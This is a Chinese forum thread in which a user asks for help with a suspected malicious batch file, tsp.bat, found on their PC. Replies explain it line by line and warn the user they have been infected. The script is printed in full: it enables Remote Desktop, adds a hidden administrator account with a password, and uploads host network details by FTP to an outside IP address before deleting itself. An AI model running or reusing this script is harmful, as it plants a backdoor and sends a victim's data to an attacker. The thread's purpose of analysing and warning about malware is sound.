62,074
社区成员
发帖
与我相关
我的任务
分享在我电脑上的一段怀疑是恶意程序的批处理文件代码,谁能给解释下?
文件名是:tsp.bat
代码如下:
代码如下:
cmd /c "@ipconfig >>3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
net1 user user$ user123$ /add >>3389.txt
net1 localgroup administrators user$/add >>3389.txt
echo open 42.96.173.195> cmd.txt
echo 123>> cmd.txt
echo 123>> cmd.txt
echo binary >> cmd.txt
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
del 3389.txt
del cmd.txt
del %0
exit
...全文
请发表友善的回复…
发表回复
hushoubo 2013-03-22
- 打赏
- 举报
杀吧,毫不留情
我是老姚 2013-03-22
- 打赏
- 举报
恭喜,你中招了。赶紧杀吧
myhope88 2013-03-22
- 打赏
- 举报
就是上传信息到远程服务器上吧
devmiao 2013-03-22
- 打赏
- 举报
cmd /c "@ipconfig >>3389.txt
将本机的ip、网关等信息写入3389.txt
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt
打开3389,远程桌面服务
net1 user user$ user123$ /add >>3389.txt
添加一个叫user$的用户,密码user123$
net1 localgroup administrators user$/add >>3389.txt
将user$用户添加到管理员组
echo open 42.96.173.195> cmd.txt
open不知道是什么程序,应该是攻击者自己的程序,不知道干嘛的
echo 123>> cmd.txt
往cmd.txt中写入123
echo 123>> cmd.txt
echo binary >> cmd.txt
写入binary
echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt
将3389.txt的文本写入一个随机名字的文件中
echo bye >> cmd.txt
ftp -s:cmd.txt
好吧,看到这里我看懂了,前面是把运行的结果以123 123为用户名密码上传到42.96.173.195服务器上
del 3389.txt
del cmd.txt
del %0
把本地的几个文件删除
exit
